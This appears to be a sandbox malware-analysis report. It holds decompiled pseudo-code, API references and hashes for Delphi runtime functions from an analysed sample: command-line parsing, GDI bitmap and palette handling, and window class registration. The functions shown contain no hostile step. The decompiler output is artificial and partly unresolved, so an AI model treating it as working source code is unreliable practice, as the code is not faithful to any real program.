                                                    • Opcode ID: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                    • Instruction ID: 003888812708ca8383a4c1960096dd24bca7936a94d77342cebcc1c5295c8c4e
                                                    • Opcode Fuzzy Hash: 186572999e7babe0e9bb68bc67f471013412e5678f21bde4cccaa072d4ecc509
                                                    • Instruction Fuzzy Hash: 7551FE7590121D9FCB66DB59C981BD9B3BCAF4C304F4041EAE508E7202D678AFC58FA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E0041CE2C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr* _v8;
                                                    				char _v12;
                                                    				char _v16;
                                                    				void* _t71;
                                                    				char _t72;
                                                    				char _t73;
                                                    				intOrPtr _t88;
                                                    				CHAR* _t91;
                                                    				CHAR** _t94;
                                                    				void* _t95;
                                                    				void* _t96;
                                                    				void* _t97;
                                                    				intOrPtr _t98;
                                                    
                                                    				_t96 = _t97;
                                                    				_t98 = _t97 + 0xfffffff4;
                                                    				_v16 = 0;
                                                    				_t71 = __edx;
                                                    				_v8 = __eax;
                                                    				_t94 =  &_v12;
                                                    				 *[fs:eax] = _t98;
                                                    				E0041BEF0(_v8);
                                                    				 *[fs:eax] = _t98;
                                                    				 *((intOrPtr*)( *_v8 + 0x44))( *[fs:eax], 0x41cf5e, _t96,  *[fs:eax], 0x41cf7b, _t96, __edi, __esi, __ebx, _t95);
                                                    				 *_t94 = E00404E80(_t71);
                                                    				while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                                                    					 *_t94 = CharNextA( *_t94);
                                                    				}
                                                    				while(1) {
                                                    					_t72 =  *( *_t94);
                                                    					if(_t72 == 0) {
                                                    						break;
                                                    					}
                                                    					if(_t72 != E0041CFA4(_v8)) {
                                                    						_t91 =  *_t94;
                                                    						while(1) {
                                                    							_t73 =  *( *_t94);
                                                    							if(_t73 <= 0x20 || _t73 == E0041CF8C(_v8)) {
                                                    								break;
                                                    							}
                                                    							 *_t94 = CharNextA( *_t94);
                                                    						}
                                                    						E00404AB0( &_v16,  *_t94 - _t91, _t91);
                                                    					} else {
                                                    						E004091D4(_t94,  &_v16, E0041CFA4(_v8));
                                                    					}
                                                    					 *((intOrPtr*)( *_v8 + 0x38))();
                                                    					while( *( *_t94) - 0xffffffffffffffe1 < 0) {
                                                    						 *_t94 = CharNextA( *_t94);
                                                    					}
                                                    					if(E0041CF8C(_v8) ==  *( *_t94)) {
                                                    						if( *(CharNextA( *_t94)) == 0) {
                                                    							 *((intOrPtr*)( *_v8 + 0x38))();
                                                    						}
                                                    						do {
                                                    							 *_t94 = CharNextA( *_t94);
                                                    						} while ( *( *_t94) - 0xffffffffffffffe1 < 0);
                                                    					}
                                                    				}
                                                    				_pop(_t88);
                                                    				 *[fs:eax] = _t88;
                                                    				_push(E0041CF65);
                                                    				return E0041BFAC(_v8);
                                                    			}
                                                    Addresses:
                                                    0x0041ce2d 0x0041ce2f 0x0041ce37 0x0041ce3a 0x0041ce3c 0x0041ce3f 0x0041ce4d 0x0041ce53
                                                    0x0041ce63 0x0041ce6b 0x0041ce75 0x0041ce83 0x0041ce81 0x0041ce81 0x0041cf3c 0x0041cf3e
                                                    0x0041cf42 0x00000000 0x00000000 0x0041ce9b 0x0041ceb3 0x0041cec1 0x0041cec3 0x0041cec8
                                                    0x00000000 0x00000000 0x0041cebf 0x0041cebf 0x0041cedf 0x0041ce9d 0x0041ceac 0x0041ceac
                                                    0x0041ceec 0x0041cefb 0x0041cef9 0x0041cef9 0x0041cf10 0x0041cf1d 0x0041cf26 0x0041cf26
                                                    0x0041cf29 0x0041cf31 0x0041cf38 0x0041cf29 0x0041cf10 0x0041cf4a 0x0041cf4d 0x0041cf50
                                                    0x0041cf5d

                                                    APIs
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CE7C
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CEF4
                                                    • CharNextA.USER32(?,?,00000000,0041CF7B), ref: 0041CF15
                                                    • CharNextA.USER32(00000000,?,?,00000000,0041CF7B), ref: 0041CF2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID:
                                                    • API String ID: 3213498283-3916222277
                                                    • Opcode ID: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                    • Instruction ID: 11efbd69cb5f73df2cbcf5fefe28e22a1c1bddc5dbaf51a38cd0fed122abd7e5
                                                    • Opcode Fuzzy Hash: 24b7eb0b41e4ee8e508986ba2351e00e2282b7539fe7d38dfc5498590e9056e5
                                                    • Instruction Fuzzy Hash: A1415130A44244DFCB11DF79C991999BBF6EF5A30472404AAF4C1D7392C738AD82DB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00426AA0(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr _v12;
                                                    				signed int _v16;
                                                    				intOrPtr _v20;
                                                    				signed int _v24;
                                                    				signed int _v32;
                                                    				signed short _v44;
                                                    				int _t36;
                                                    				signed int _t37;
                                                    				signed short _t38;
                                                    				signed int _t39;
                                                    				signed short _t43;
                                                    				signed int* _t47;
                                                    				signed int _t51;
                                                    				intOrPtr _t61;
                                                    				void* _t67;
                                                    				void* _t68;
                                                    				void* _t69;
                                                    				intOrPtr _t70;
                                                    
                                                    				_t68 = _t69;
                                                    				_t70 = _t69 + 0xffffff90;
                                                    				_v16 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_t47 = _a8;
                                                    				_v24 = _v16 << 4;
                                                    				_v20 = E00408D24(_v24, __eflags);
                                                    				 *[fs:edx] = _t70;
                                                    				_t51 = _v24;
                                                    				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x426d97, _t68, __edi, __esi, __ebx, _t67);
                                                    				if(( *_t47 | _t47[1]) != 0) {
                                                    					_t36 = _a4;
                                                    					 *_t36 =  *_t47;
                                                    					 *(_t36 + 4) = _t47[1];
                                                    				} else {
                                                    					 *_a4 = GetSystemMetrics(0xb);
                                                    					_t36 = GetSystemMetrics(0xc);
                                                    					 *(_a4 + 4) = _t36;
                                                    				}
                                                    				_push(0);
                                                    				L00407638();
                                                    				_v44 = _t36;
                                                    				if(_v44 == 0) {
                                                    					E00425F64(_t51);
                                                    				}
                                                    				_push(_t68);
                                                    				_push(0x426b89);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t70;
                                                    				_push(0xe);
                                                    				_t37 = _v44;
                                                    				_push(_t37);
                                                    				L00407380();
                                                    				_push(0xc);
                                                    				_t38 = _v44;
                                                    				_push(_t38);
                                                    				L00407380();
                                                    				_t39 = _t37 * _t38;
                                                    				if(_t39 <= 8) {
                                                    					__eflags = 1;
                                                    					_v32 = 1 << _t39;
                                                    				} else {
                                                    					_v32 = 0x7fffffff;
                                                    				}
                                                    				_pop(_t61);
                                                    				 *[fs:eax] = _t61;
                                                    				_push(0x426b90);
                                                    				_t43 = _v44;
                                                    				_push(_t43);
                                                    				_push(0);
                                                    				L00407888();
                                                    				return _t43;
                                                    			}
                                                    0x00426aa1
                                                    0x00426aa3
                                                    0x00426aa9
                                                    0x00426aac
                                                    0x00426aaf
                                                    0x00426ab2
                                                    0x00426abb
                                                    0x00426ac6
                                                    0x00426ad4
                                                    0x00426ada
                                                    0x00426ae2
                                                    0x00426aea
                                                    0x00426b07
                                                    0x00426b0c
                                                    0x00426b11
                                                    0x00426aec
                                                    0x00426af6
                                                    0x00426afa
                                                    0x00426b02
                                                    0x00426b02
                                                    0x00426b14
                                                    0x00426b16
                                                    0x00426b1b
                                                    0x00426b22
                                                    0x00426b24
                                                    0x00426b24
                                                    0x00426b2b
                                                    0x00426b2c
                                                    0x00426b31
                                                    0x00426b34
                                                    0x00426b37
                                                    0x00426b39
                                                    0x00426b3c
                                                    0x00426b3d
                                                    0x00426b44
                                                    0x00426b46
                                                    0x00426b49
                                                    0x00426b4a
                                                    0x00426b53
                                                    0x00426b59
                                                    0x00426b6b
                                                    0x00426b6d
                                                    0x00426b5b
                                                    0x00426b5b
                                                    0x00426b5b
                                                    0x00426b72
                                                    0x00426b75
                                                    0x00426b78
                                                    0x00426b7d
                                                    0x00426b80
                                                    0x00426b81
                                                    0x00426b83
                                                    0x00426b88

                                                    APIs
                                                    • GetSystemMetrics.USER32 ref: 00426AEE
                                                    • GetSystemMetrics.USER32 ref: 00426AFA
                                                    • 733AAC50.USER32(00000000), ref: 00426B16
                                                    • 733AAD70.GDI32(00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B3D
                                                    • 733AAD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00426B89,?,00000000), ref: 00426B4A
                                                    • 733AB380.USER32(00000000,00000000,00426B90,0000000E,00000000,00426B89,?,00000000), ref: 00426B83
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MetricsSystem$B380
                                                    • String ID:
                                                    • API String ID: 3145338429-0
                                                    • Opcode ID: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                    • Instruction ID: 72199b77af9d5ad6b2438074c355ca19ed48f1e35d4323483afc0bacfeaa441d
                                                    • Opcode Fuzzy Hash: fe6f9d9fad2ee4ecbfc1d9d7efc59859acc1fc1413ed063bf02da4aa932c8209
                                                    • Instruction Fuzzy Hash: 90316F74E00214AFEB00EF65C841AAEBBF5FB49750F51856AE814AB394C638A941CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 45%
                                                    			E00426F10(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                    				char _v5;
                                                    				struct HDC__* _v12;
                                                    				struct HDC__* _v16;
                                                    				struct HDC__* _t29;
                                                    				struct tagBITMAPINFO* _t32;
                                                    				intOrPtr _t39;
                                                    				struct HBITMAP__* _t43;
                                                    				void* _t46;
                                                    
                                                    				_t32 = __ecx;
                                                    				_t43 = __eax;
                                                    				E00426DC0(__eax, _a4, __ecx);
                                                    				_v12 = 0;
                                                    				_push(0);
                                                    				L004072E0();
                                                    				_v16 = 0;
                                                    				_push(_t46);
                                                    				_push(0x426fad);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t46 + 0xfffffff4;
                                                    				if(__edx != 0) {
                                                    					_push(0);
                                                    					_push(__edx);
                                                    					_t29 = _v16;
                                                    					_push(_t29);
                                                    					L00407440();
                                                    					_v12 = _t29;
                                                    					_push(_v16);
                                                    					L00407418();
                                                    				}
                                                    				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
                                                    				_pop(_t39);
                                                    				 *[fs:eax] = _t39;
                                                    				_push(0x426fb4);
                                                    				if(_v12 != 0) {
                                                    					_push(0);
                                                    					_push(_v12);
                                                    					_push(_v16);
                                                    					L00407440();
                                                    				}
                                                    				return DeleteDC(_v16);
                                                    			}
                                                    0x00426f19
                                                    0x00426f1d
                                                    0x00426f26
                                                    0x00426f2d
                                                    0x00426f30
                                                    0x00426f32
                                                    0x00426f37
                                                    0x00426f3c
                                                    0x00426f3d
                                                    0x00426f42
                                                    0x00426f45
                                                    0x00426f4a
                                                    0x00426f4c
                                                    0x00426f4e
                                                    0x00426f4f
                                                    0x00426f52
                                                    0x00426f53
                                                    0x00426f58
                                                    0x00426f5e
                                                    0x00426f5f
                                                    0x00426f5f
                                                    0x00426f7d
                                                    0x00426f83
                                                    0x00426f86
                                                    0x00426f89
                                                    0x00426f92
                                                    0x00426f94
                                                    0x00426f99
                                                    0x00426f9d
                                                    0x00426f9e
                                                    0x00426f9e
                                                    0x00426fac

                                                    APIs
                                                      • Part of subcall function 00426DC0: GetObjectA.GDI32(?,00000054), ref: 00426DD4
                                                    • 733AA590.GDI32(00000000), ref: 00426F32
                                                    • 733AB410.GDI32(?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F53
                                                    • 733AB150.GDI32(?,?,?,00000000,00000000,00426FAD,?,00000000), ref: 00426F5F
                                                    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00426F76
                                                    • 733AB410.GDI32(?,00000000,00000000,00426FB4,?,00000000), ref: 00426F9E
                                                    • DeleteDC.GDI32(?), ref: 00426FA7
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B410$A590B150BitsDeleteObject
                                                    • String ID:
                                                    • API String ID: 3837315262-0
                                                    • Opcode ID: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                    • Instruction ID: 77de815d1256251625e09d43045054b0a879545964fd81c4b279a3d00da1559d
                                                    • Opcode Fuzzy Hash: cf66ecea4cbc03e348312b4209bf1e0b5033cbc5b509529efbc9ca410bba2e7b
                                                    • Instruction Fuzzy Hash: C2114F75F082047FDB10DBA9DC41F9EBBECEB48714F5284AAB914E7281D678A900C769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00426750(struct HDC__* __eax, signed int __ecx) {
                                                    				char _v1036;
                                                    				signed int _v1038;
                                                    				struct tagRGBQUAD _v1048;
                                                    				short _v1066;
                                                    				short* _t15;
                                                    				void* _t18;
                                                    				struct HDC__* _t23;
                                                    				void* _t26;
                                                    				short* _t31;
                                                    				short* _t32;
                                                    
                                                    				_t31 = 0;
                                                    				 *_t32 = 0x300;
                                                    				if(__eax == 0) {
                                                    					_v1038 = __ecx;
                                                    					E004029DC(_t26, __ecx << 2,  &_v1036);
                                                    				} else {
                                                    					_push(0);
                                                    					L004072E0();
                                                    					_t23 = __eax;
                                                    					_t18 = SelectObject(__eax, __eax);
                                                    					_v1066 = GetDIBColorTable(_t23, 0, 0x100,  &_v1048);
                                                    					SelectObject(_t23, _t18);
                                                    					DeleteDC(_t23);
                                                    				}
                                                    				if(_v1038 != 0) {
                                                    					if(_v1038 != 0x10 || E004266B8(_t32) == 0) {
                                                    						E00426548( &_v1036, _v1038 & 0x0000ffff);
                                                    					}
                                                    					_t15 = _t32;
                                                    					_push(_t15);
                                                    					L00407308();
                                                    					_t31 = _t15;
                                                    				}
                                                    				return _t31;
                                                    			}
                                                    0x0042675b
                                                    0x0042675d
                                                    0x00426765
                                                    0x0042679f
                                                    0x004267ad
                                                    0x00426767
                                                    0x00426767
                                                    0x00426769
                                                    0x0042676e
                                                    0x00426772
                                                    0x0042678b
                                                    0x00426792
                                                    0x00426798
                                                    0x00426798
                                                    0x004267b8
                                                    0x004267c0
                                                    0x004267d6
                                                    0x004267d6
                                                    0x004267db
                                                    0x004267dd
                                                    0x004267de
                                                    0x004267e3
                                                    0x004267e3
                                                    0x004267f0

                                                    APIs
                                                    • 733AA590.GDI32(00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 00426769
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00426772
                                                    • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,0042A2D3,?,?,?,?,00428DD3), ref: 00426786
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00426792
                                                    • DeleteDC.GDI32(00000000), ref: 00426798
                                                    • 733AA8F0.GDI32(?,00000000,?,?,0042A2D3,?,?,?,?,00428DD3,00000000,00428E5F), ref: 004267DE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ObjectSelect$A590ColorDeleteTable
                                                    • String ID:
                                                    • API String ID: 1056449717-0
                                                    • Opcode ID: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                    • Instruction ID: efc5091b96ee346cfcb1bb7471c8c7bb22fdf2c070b44c7d61a8e62d02ab9fa2
                                                    • Opcode Fuzzy Hash: 0bb8fb8edcdc7087e5e3f325450ea8167a7ed7ac943ba32b5a45adc2cc887e54
                                                    • Instruction Fuzzy Hash: 8701847160832061E2246766AC43A6B72AC9FC0758F41882FB988A72C1E67C9845D3AB
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00406B91(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                    				long _t11;
                                                    				void* _t16;
                                                    
                                                    				_t16 = __ebx;
                                                    				 *__edi =  *__edi + __ecx;
                                                    				 *((intOrPtr*)(__eax - 0x49e5bc)) =  *((intOrPtr*)(__eax - 0x49e5bc)) + __eax - 0x49e5bc;
                                                    				 *0x49b00c = 2;
                                                    				 *0x49e014 = 0x40124c;
                                                    				 *0x49e018 = 0x40125c;
                                                    				 *0x49e04e = 2;
                                                    				 *0x49e000 = E00405998;
                                                    				if(E00403A2C() != 0) {
                                                    					_t3 = E00403A5C();
                                                    				}
                                                    				E00403B20(_t3);
                                                    				 *0x49e054 = 0xd7b0;
                                                    				 *0x49e220 = 0xd7b0;
                                                    				 *0x49e3ec = 0xd7b0;
                                                    				 *0x49e040 = GetCommandLineA();
                                                    				 *0x49e03c = E004013AC();
                                                    				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                    					 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
                                                    				} else {
                                                    					if((GetVersion() & 0x000000ff) <= 4) {
                                                    						 *0x49e5c0 = E00406AC8(GetThreadLocale(), _t16, __eflags);
                                                    					} else {
                                                    						 *0x49e5c0 = 3;
                                                    					}
                                                    				}
                                                    				_t11 = GetCurrentThreadId();
                                                    				 *0x49e034 = _t11;
                                                    				return _t11;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 00403A2C: GetKeyboardType.USER32 ref: 00403A31
                                                      • Part of subcall function 00403A2C: GetKeyboardType.USER32 ref: 00403A3D
                                                    • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                    • GetVersion.KERNEL32 ref: 00406C0B
                                                    • GetVersion.KERNEL32 ref: 00406C1C
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                      • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                      • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                      • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                    • GetThreadLocale.KERNEL32 ref: 00406C38
                                                      • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                    • String ID:
                                                    • API String ID: 3734044017-0
                                                    • Opcode ID: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                    • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                    • Opcode Fuzzy Hash: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                    • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E0042AE8C(intOrPtr* __eax, void* __edx) {
                                                    				intOrPtr* _v8;
                                                    				struct HPALETTE__* _v12;
                                                    				char _v13;
                                                    				intOrPtr _v25;
                                                    				intOrPtr _v29;
                                                    				intOrPtr _v33;
                                                    				intOrPtr _v57;
                                                    				short _v59;
                                                    				short _v61;
                                                    				intOrPtr _v65;
                                                    				intOrPtr _v69;
                                                    				intOrPtr _v73;
                                                    				intOrPtr _v77;
                                                    				intOrPtr _v89;
                                                    				intOrPtr _v93;
                                                    				void _v97;
                                                    				void* _t44;
                                                    				void* _t46;
                                                    				intOrPtr _t49;
                                                    				void* _t54;
                                                    				struct HPALETTE__* _t56;
                                                    				void* _t70;
                                                    				void* _t72;
                                                    				void* _t73;
                                                    				struct HDC__* _t74;
                                                    				intOrPtr _t95;
                                                    				void* _t105;
                                                    				void* _t107;
                                                    				void* _t108;
                                                    				intOrPtr _t110;
                                                    
                                                    				_t105 = _t107;
                                                    				_t108 = _t107 + 0xffffffa0;
                                                    				_t70 = __edx;
                                                    				_v8 = __eax;
                                                    				_t44 = E00429FC8(_v8);
                                                    				if(_t70 == _t44) {
                                                    					L16:
                                                    					return _t44;
                                                    				} else {
                                                    					_t46 = _t70 - 1;
                                                    					if(_t46 < 0) {
                                                    						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
                                                    						goto L16;
                                                    					} else {
                                                    						if(_t46 == 7) {
                                                    							_t49 =  *0x49d90c; // 0x422ec0
                                                    							_t44 = E00425F28(_t49);
                                                    							goto L16;
                                                    						} else {
                                                    							E004032B4( &_v97, 0x54);
                                                    							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
                                                    							_t110 = _t108 + 0xc;
                                                    							_v13 = 0;
                                                    							_v77 = 0;
                                                    							_v73 = 0x28;
                                                    							_v69 = _v93;
                                                    							_v65 = _v89;
                                                    							_v61 = 1;
                                                    							_v59 =  *0x0049B8B3 & 0x000000ff;
                                                    							_t55 =  *((intOrPtr*)(_t54 + 0x10));
                                                    							_v12 =  *((intOrPtr*)(_t54 + 0x10));
                                                    							_t72 = _t70 - 2;
                                                    							if(_t72 == 0) {
                                                    								_t56 =  *0x49e894; // 0x770805ad
                                                    								_v12 = _t56;
                                                    							} else {
                                                    								_t73 = _t72 - 1;
                                                    								if(_t73 == 0) {
                                                    									_push(0);
                                                    									L00407638();
                                                    									_t74 = E00426060(_t55);
                                                    									_v12 = CreateHalftonePalette(_t74);
                                                    									_v13 = 1;
                                                    									_push(_t74);
                                                    									_push(0);
                                                    									L00407888();
                                                    								} else {
                                                    									if(_t73 == 2) {
                                                    										_v57 = 3;
                                                    										_v33 = 0xf800;
                                                    										_v29 = 0x7e0;
                                                    										_v25 = 0x1f;
                                                    									}
                                                    								}
                                                    							}
                                                    							 *[fs:eax] = _t110;
                                                    							 *((char*)(_v8 + 0x22)) = E00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t105),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
                                                    							_pop(_t95);
                                                    							 *[fs:eax] = _t95;
                                                    							_push(0x42afe0);
                                                    							if(_v13 != 0) {
                                                    								return DeleteObject(_v12);
                                                    							}
                                                    							return 0;
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • 733AAC50.USER32(00000000), ref: 0042AF49
                                                    • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                    • 733AB380.USER32(00000000,00000000,00000000,00000000), ref: 0042AF65
                                                    • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380CreateDeleteHalftoneObjectPalette
                                                    • String ID: (
                                                    • API String ID: 733450718-3887548279
                                                    • Opcode ID: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                    • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                    • Opcode Fuzzy Hash: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                    • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                    				struct _WNDCLASSA _v44;
                                                    				struct HINSTANCE__* _t6;
                                                    				CHAR* _t8;
                                                    				struct HINSTANCE__* _t9;
                                                    				int _t10;
                                                    				void* _t11;
                                                    				struct HINSTANCE__* _t13;
                                                    				struct HINSTANCE__* _t19;
                                                    				CHAR* _t20;
                                                    				struct HWND__* _t22;
                                                    				CHAR* _t24;
                                                    
                                                    				_t6 =  *0x49e668; // 0x400000
                                                    				 *0x49b5dc = _t6;
                                                    				_t8 =  *0x49b5f0; // 0x422c78
                                                    				_t9 =  *0x49e668; // 0x400000
                                                    				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                                    				asm("sbb eax, eax");
                                                    				_t11 = _t10 + 1;
                                                    				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
                                                    					if(_t11 != 0) {
                                                    						_t19 =  *0x49e668; // 0x400000
                                                    						_t20 =  *0x49b5f0; // 0x422c78
                                                    						UnregisterClassA(_t20, _t19);
                                                    					}
                                                    					RegisterClassA(0x49b5cc);
                                                    				}
                                                    				_t13 =  *0x49e668; // 0x400000
                                                    				_t24 =  *0x49b5f0; // 0x422c78
                                                    				_t22 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                                                    				if(_a6 != 0) {
                                                    					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
                                                    				}
                                                    				return _t22;
                                                    			}

                                                    APIs
                                                    • GetClassInfoA.USER32 ref: 00422CA9
                                                    • UnregisterClassA.USER32 ref: 00422CD2
                                                    • RegisterClassA.USER32 ref: 00422CDC
                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00422D27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
